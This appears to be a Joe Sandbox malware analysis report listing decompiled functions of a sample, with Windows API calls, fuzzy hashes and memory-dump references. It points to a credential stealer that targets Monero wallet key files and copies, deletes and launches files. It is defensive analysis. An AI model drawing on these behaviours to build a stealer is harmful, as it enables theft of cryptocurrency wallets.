Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 6d222fa89ef8957d80e4b3b87e993bf2a32d00e3388b49f1c028735272fc26c2
Instruction ID: e50d0cf4f3bcafcf9dc8494c6925ebec5f076ef97742b2731c9cf30dde71d92d
Opcode Fuzzy Hash: 6d222fa89ef8957d80e4b3b87e993bf2a32d00e3388b49f1c028735272fc26c2
Instruction Fuzzy Hash: 8A41E6B150075C5EEB218B288C85FFB7FE8FB45708F1444E8E98AC6282E2719A45DF65

Function 008B6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008B6663

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

ShellExecuteEx.SHELL32(0000003C), ref: 008B6726
ExitProcess.KERNEL32 ref: 008B6755

Strings

<, xrefs: 008B66D9

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
Instruction ID: 6ce7aa68284e9569fbe28f3c3b307876718a7f339028a76d5a5d8ba6fbe9b80c
Opcode Fuzzy Hash: e7d5c4636700305feaf1a98ee92fc575518d43d95e83dbae16641ead25e32433
Instruction Fuzzy Hash: EF312DB1801218AADB18EB94DC91BDD7B7CFF14300F404199F215A6291DF746B49CF66

Function 008B87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008C0E28,00000000,?), ref: 008B882F
RtlAllocateHeap.NTDLL(00000000), ref: 008B8836
wsprintfA.USER32 ref: 008B8850

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Strings

%dx%d, xrefs: 008B8847

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
Instruction ID: 81c0b68861c33fb93aae23fe141e97c78bb95daf3551860b393ea2cccc6ef3d5
Opcode Fuzzy Hash: e4ae1d051de5c86f5e35f346892ebd6eef9299bf5744b9c4a7c1b22074dc2170
Instruction Fuzzy Hash: C021FEB1A44248AFDB04DFD4DD85FAEBBB8FB49711F104519F605EB280C779A9018BA2

Function 008B8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008B951E,00000000), ref: 008B8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 008B8D62
wsprintfW.USER32 ref: 008B8D78

Strings

%hs, xrefs: 008B8D6F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
Instruction ID: 65d18f8d3add212fe5177e21684a6aa0b876139e8af1904ebda3dde31a996bd6
Opcode Fuzzy Hash: 5ed4ecc9a91c637e7eb455aff0625e81eab0b8b9478dfae48bbe63ab8a176d21
Instruction Fuzzy Hash: B3E08CB1A40208FBC700DFD4DC4AE697BB8EB08702F004098FD09CB280DA71AE018B92

Function 008AD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,0127A8D8,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86

Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008AD481
lstrlen.KERNEL32(00000000), ref: 008AD698
lstrlen.KERNEL32(00000000), ref: 008AD6AC
DeleteFileA.KERNEL32(00000000), ref: 008AD72B

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c7caf2da720fc98b85832ef0cbe78bdfcdb49a1e281bd2e30e12d872918b1dc1
Instruction ID: fef5633289d01aa2e8342a7fbbd8b2e90755bcb468ebfa0647ffd17220de2b33
Opcode Fuzzy Hash: c7caf2da720fc98b85832ef0cbe78bdfcdb49a1e281bd2e30e12d872918b1dc1
Instruction Fuzzy Hash: C491D271910118AADB18EBA8DC95DEE7338FF14300F504169F517F65A1EF346A49CB63

Function 008B3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: c30f2030a7330f4b76c38d5e93187fc5e2dde67a217590624edf4578e110eb61
Instruction ID: 3a6dd9496f05504a809eed1f8afd79e54f5bda7460a35775867a95d06006ae39
Opcode Fuzzy Hash: c30f2030a7330f4b76c38d5e93187fc5e2dde67a217590624edf4578e110eb61
Instruction Fuzzy Hash: 68414EB5D10109EBCB08EFE4D895AEEB774FB54704F008018E416B6390EB75AA09DFA2

Function 008B92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(008B3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008B3AEE,?), ref: 008B92FC
GetFileSizeEx.KERNEL32(000000FF,008B3AEE), ref: 008B9319
CloseHandle.KERNEL32(000000FF), ref: 008B9327

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
Instruction ID: 257585cc5a3dc288ab363ee6d8365f6af0b959f1f83dd4c9e0797a0ccddf6fd7
Opcode Fuzzy Hash: b3b27b2d191ec665ac7e2a5284bda1e1a1ad5caa617d76810be20afada62ddbd
Instruction Fuzzy Hash: 53F01975E44208ABDB10DBE4DC49B9E77F9EB58710F10C254F651EB3C0D670A6018B50

Function 008BC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 008BC74E

Part of subcall function 008BBF9F: __amsg_exit.LIBCMT ref: 008BBFAF

__getptd.LIBCMT ref: 008BC765
__amsg_exit.LIBCMT ref: 008BC773
__updatetlocinfoEx_nolock.LIBCMT ref: 008BC797

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
Instruction ID: 639d13119375a35f37d0bf2f2b25d1cfd001ad8f880e77a436d7ada6804f552e
Opcode Fuzzy Hash: 0e2e960b5c657c8a8a5577c7957f6f17b6e4df1655f732595367ffbadc3f75b7
